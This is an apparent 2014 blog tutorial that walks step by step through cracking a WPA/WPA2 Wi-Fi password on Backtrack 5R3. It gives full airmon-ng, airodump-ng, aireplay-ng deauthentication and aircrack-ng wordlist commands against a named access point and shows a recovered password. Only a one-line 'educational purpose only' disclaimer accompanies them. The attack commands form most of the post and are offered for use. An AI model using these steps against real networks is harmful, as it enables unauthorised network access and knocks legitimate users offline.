Wednesday, 23 July 2014

Hacking Wifi Wpa/Wpa2 Password With Backtrack 5R3 Tested

Hello good Morning everybody,now i’m back to share how to Hacking wifi WPA2 .. you just need Linux for penetration testing

You can use Backtrack / Kali Linux ..

.. detail tools needed are
  • airmon-ng
  • airodump-ng
  • aireplay-ng
  • aircrack-ng
  • The Great Passwordlist !
yea i’m use Backtrack 5R3 , thats tools was added 

now i will share Step by step cracking wifi  checkthis out


open your terminal and do it 
airmon-ng start wlan0


can you see monitor mode enable on (mon0) was active , next step
airodump-ng mon0


yeaaa choose your target Accesspoint/ESSID ,my target is r00tk17 ,next step


after you choose target , you just Ctrl + C for stop airodump-ng and lets see the picture on the text
choose your target BSSID , CH (channel),ok look
1
airodump-ng -c 1 -w xsanWPA2 --bssid 84:A8:E4:AF:66:5F --ivs mon0

note :
  • -c  = channel
  • -w = same as –write
  • –bssid = your target BSSID
  • –ivs = is captures files with extention .ivs
  • mon0 = your interface
next step



In this step , we need WPA Handshake , yea still empty .. how to get WPA Handshake??
we need kick/Deauth another client .. look at next image

1
aireplay-ng -0 10 -e r00tk17 mon0

note :
  • -0 =  deauthenticate 1 or all stations
  • -e = the target AccessPoint
  • mon0 = our interfaces
  • so if i choose -0 10 > i was kick / deauth 10 client on network
Next Step , if the client was kick.. he will be connect again  and we get WPA Handshake like this image



What next if we get WPA handshake?? run your aircrack-ng like this image

1
aircrack-ng -w /pentest/password/wordlist/darckc0de.lst xsanWPA2-01.ivs

Note :
  • -w = your posision passowrdlist
  • file .ivs is file was you made in on step airodump-ng -c 1 -w xsanWPA2 –bssid 84:A8:E4:AF:66:5F –ivs mon0
  • xsanWPA2 automatic to be xsanWPA2-01.ivs
Running Aircrack-ng


binggo  i got the password wifi , “nagabacktrack2013″ for crack this wifi you need great passwordlist , explore your mind and remember >

This tutorial JUST FOR EDUCATIONAL PURPOSE ONLY !!


No comments:

Post a Comment